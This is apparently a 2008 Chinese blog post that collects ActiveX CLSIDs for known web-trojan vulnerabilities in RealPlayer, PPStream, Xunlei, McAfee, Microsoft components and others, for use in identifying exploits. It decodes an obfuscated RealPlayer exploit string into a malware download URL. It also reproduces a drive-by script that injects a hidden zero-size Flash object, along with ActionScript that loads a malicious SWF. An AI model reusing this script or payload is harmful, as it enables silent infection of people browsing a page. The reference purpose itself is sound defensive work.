本文档列举了多种常见的ActiveX控件及其存在的安全漏洞,包括RealPlayer、百度搜霸、PPStream等软件中的控件漏洞详情。通过具体案例介绍了如何利用这些漏洞执行恶意代码。
方便自己 也许方便他人 搜索到的挂马 clsid ——漏洞
2008年03月07日 星期五 13:55
|
记性不太好 有时候遇到挂马看clsid不知道是什么漏洞 从网络巡警 超级巡警 懒人小G 余弦函数等的博客或者主页上搜集了几个 供自己查询 ^_^ 本来想一个链接一下的 后来想象也许自己去搜索这些高手的博客获得的可能会更多 要查看详细的大家自己动手吧 ^_^
这是realplayer漏洞,解密就从 RHptd4RPFZVOdoSSTnrWPaQs1c3IVN2CPobMtopoPktnqu2XPeMPGp入手,这个跟前 几天的CIWchina 挂的realplayer网马是一样的,将这段字符转换为ASCII码后, 比如RH为5248,第二位异或第三位,然后连接第四位得到后转换为字符,2 XOR 4=6,连接得到68,转换后为h. 解密后为: hxxp://c.wacsy.com/ok.exe 雅虎通的Webcam Upload ActiveX控件实现上存在缓冲区溢出漏洞,远程攻击 者可能利用此漏洞控制用户机器,当含有此漏洞的用户浏览到黑客恶意构造的 网页时,将在后台自动下载并执行木马病毒,给用户带来损失。 漏洞成因:雅虎通的Webcam Upload(ywcupl.dll)ActiveX控件没有正确的验 证对Server属性的输入。如果用户受骗访问了恶意站点向该属性传送了超长字 符串然后又调用了Send()方式的话,就可能触发栈溢出,导致执行任意指令。 DCE2F8B1-A520-11D4-8FD0-00D0B7730277 msgbox或者wscript.echo Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏 问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 问题存在于'rmoc3260.dll' ActiveX控件,版本为6.0.10.4: {2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93} {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA} 可能导致在释放后修改堆块,并覆盖部分寄存器,允许任意代码执行。 RealPlayer播放列表处理栈溢出漏洞 RealPlayer 播放器中的MPAMedia.dll 提供的数据库组件,在处理播放列表名 时存在栈溢出漏洞,可以使用ierpplug.dll提供的IERPCtl ActiveX 控件导入 一个特殊的播放列表让RealPlayer读取,病毒作者可以通过构造包含此漏洞触 发代码的恶意网页,当用户不小心浏览过该网页时,如果电脑中安装的 RealPlayer 播放器版本包含此漏洞,就可以触发这个溢出,导致执行任意代 码。 RealPlayer 11 Beta RealPlayer 10.5 百度搜霸ActiveX控件远程代码执行漏洞 clsid:A7F05EE4-0426-454F-8013-C41E3596E9E9 PPStream 堆栈溢出 clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458 clsid:20C2C286-BDE8-441B-B73D-AFA22D914DA5" http://www.sebug.net/vulndb/2520 PPStream PowerList.ocx 2.1.6 .2916 详细说明: PPStream是一款在线媒体播放插件。 PPStream包含的PowerList.OCX控件不正确过滤参数数据,远程攻击者可以利 用漏洞以应用程序进程权限执行任意指令。 问题是PowerList.OCX控件对SetBkImage()方法的参数缺少充分边界检查,构 建恶意WEB页,诱使用户打开,可导致以应用程序进程权限执行任意指令。 暴风影音2 mps.dll组件多个缓冲区溢出漏洞 clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB MPS.StormPlayer.1 ActiveX控件 (mps.dll) 迅雷5 DownAndPlay clsid:EEDD6FF9-13DE-496B-9A1C-D78B3215E266 DapPlayer1.0.0.41.dll 迅雷5-迅雷看看 clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F pplayer.dll 组件版本号:1.2.3.49 Web迅雷(xunlei)0day漏洞 ActiveXObject("ThunderServer.webThunder.1") Web迅雷1.7.3.109版之前的版本 雅虎GetFile方式任意文件上传漏洞 clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F CYFT ft60.dll 联众游戏 clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69 GLChat.ocx GlobalLink, GlobalLink, 2.7.0.8 超星阅读器 clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2 pdg2.dll Ssreader, Ultra Star Reader, 4.0 MS07-017漏洞:GDI 中的漏洞可能允许远程执行代码 MS06-014漏洞:Microsoft Data Access Components (MDAC) 功能中的漏洞可 能允许执行代码 clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 微软MS07-027 clsid:d4fe6227-1288-11d0-9097-00aa004254a0 Symantec的远程执行漏洞 clsid:{22ACD16F-99EB-11D2-9BB3-00400561D975} PVCalendar.ocx version 10.0.0.17 * Symantec Backup Exec for Windows Server 11d build 11.0.6235 * Symantec Backup Exec for Windows Server 11d build 11.0.7170 * Symantec Backup Exec for Windows Server 12.0 build 12.0.1364 QVOD播放器最新漏洞 clsid:{F3D0D36F-23F8-4682-A195-74C92B03D4AF} QvodInsert.dll Qvod Player 2.0 McAfee Security Center集中配置GUI远程溢出漏洞 clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602 MCSUBMGR.DLL, (McAfee Subscription manager module 6.0.0.13) McAfee SecurityCenter 7.0 McAfee SecurityCenter 6.0 McAfee SecurityCenter 4.3 jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8 JetFlExt.dll FlashGet 拒绝服务漏洞 clsid:FB5DA724-162B-11D3-8B9B-AA70B4B0B524 jccatch.dll FlashGet 1.9.6.1073 瑞星在线扫描远程代码执行漏洞 clsid:{E4E2F180-CB8B-4DE9-ACBB-DA745D3BA153} Rising Web Scan Object ActiveX控件 OL2005.dll 受影响系统: Rising OL2005.dll 18.0.0.7 联众世界GLIEDown2.dll Active 任意代码执行漏洞 联众世界的游戏大厅主程序GLWorld所安装的GLIEDown2.dll ActiveX控件 (CLSID:F917534D-535B-416B-8E8F-0C04756C31A8) 61F5C358-60FB-4A23-A312-D2B556620F20 没有正确地处理某些用户输入参数,如果用户受骗访问了恶意网页并向这些方 式传送了特制参数的话,可能导致在用户系统上执行任意指令。 利用联众 (GLCHAT.GLChatCtrl.1,clsid:61F5C358-60FB-4A23-A312-D2B556620F20) 漏洞 利用Microsoft IE畸形VML文档处理缓冲区溢出漏洞 (clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E)漏洞 利用 BaiDu(BaiduBar.Tool.1,clsid:{A7F05EE4-0426ID:-454F-8013-C41E3596E9 E9}) adobe swf <script> window.onerror=function(){return true;} function init(){window.status=”";}window.onload = init; if(document.cookie.indexOf(”play=”)==-1){ var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString(); if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0) { document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/sw flash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’); document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’); document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’); document.write(’<param name=”quality” value=”high”/>’); document.write(’<param name=”bgcolor” value=”#ffffff”/>’); document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’); document.write(’</object>’); }else {document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}} </script> 以下为正常的FLASH文件使用的脚本: // Action script…// [Action in Frame 1] var flashVersion =/hxversion; loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root); stop(); 该恶意FLASH部分内容如下: 影响版本:UUSee网络电视2008 4.0.0.32 (UUUpgrade.ocx 3.0.2.12) 漏洞分析:UUSee网络电视2008在安装的时候注册了几个ActiveX控件控件 ,其中一个控件用来UUSee自身的升级。该控件clssid为 :{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B},对应 dll:C:/PROGRA~1/COMMON~1/uusee/UUUPGR~1.OCX。由于UUUpgrade.ocx没有对 升级文件的来源进行验证,导致恶意攻击者可以通过构造假的升级文件来让 UUSee网络电视来下载攻击者指定的文件并运行 Microsoft Works 7 WkImgSrv.dll crash POC 00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 Windows组件0Day漏洞 通杀IE6与IE7浏览器 NCTAudioFile2是NCTsoft提供的一个ActiveX控件,用于处理音频数据。 clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC NCTsoft Products NCTAudioFile2 ActiveX Control Buffer Overflow The vulnerability is confirmed in the following products: - NCTAudioStudio 2.7.1 - NCTAudioEditor 2.7.1 - NCTDialogicVoice 2.7.1 新浪DLoader Class ActiveX控件任意文件下载漏洞 clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A Sina UC 新浪网络电视 Microsoft Access Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9 Vulnerable: Microsoft Access 97 + Microsoft Office 97 - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT 4.0 Microsoft Access 2002 SP2 - Microsoft Windows 2000 Professional SP3 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Workstation 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows XP Home SP1 - Microsoft Windows XP Home - Microsoft Windows XP Professional SP1 - Microsoft Windows XP Professional Microsoft Access 2002 SP1 Microsoft Access 2002 + Microsoft Office XP - Microsoft Windows 2000 Advanced Server SP2 - Microsoft Windows 2000 Advanced Server SP1 - Microsoft Windows 2000 Advanced Server - Microsoft Windows 2000 Datacenter Server SP2 - Microsoft Windows 2000 Datacenter Server SP1 - Microsoft Windows 2000 Datacenter Server - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 2000 Server SP2 - Microsoft Windows 2000 Server SP1 - Microsoft Windows 2000 Server - Microsoft Windows 2000 Terminal Services SP2 - Microsoft Windows 2000 Terminal Services SP1 - Microsoft Windows 2000 Terminal Services - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Enterprise Server 4.0 SP6a - Microsoft Windows NT Enterprise Server 4.0 SP6 - Microsoft Windows NT Server 4.0 SP6a - Microsoft Windows NT Server 4.0 SP6 - Microsoft Windows NT Terminal Server 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows XP Home - Microsoft Windows XP Professional Microsoft Access 2000 SR1 Microsoft Access 2000 SP3 - Microsoft Windows 2000 Professional SP3 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 98 - Microsoft Windows 98SE - Microsoft Windows ME - Microsoft Windows NT Workstation 4.0 SP6a - Microsoft Windows NT Workstation 4.0 SP6 - Microsoft Windows NT Workstation 4.0 SP5 - Microsoft Windows NT Workstation 4.0 SP4 - Microsoft Windows NT Workstation 4.0 SP3 - Microsoft Windows NT Workstation 4.0 SP2 - Microsoft Windows NT Workstation 4.0 SP1 - Microsoft Windows NT Workstation 4.0 - Microsoft Windows XP Home SP1 - Microsoft Windows XP Home - Microsoft Windows XP Professional SP1 - Microsoft Windows XP Professional Microsoft Access 2000 SP2 Microsoft Access 2000 + Microsoft Office 2000 - Microsoft Windows 2000 Professional - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT 4.0 Windows Media Encoder 9 中的漏洞可能允许远程执行代码 MS08-053 A8D3AD02-7508-4004-B2E9-AD33F087F43C |
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
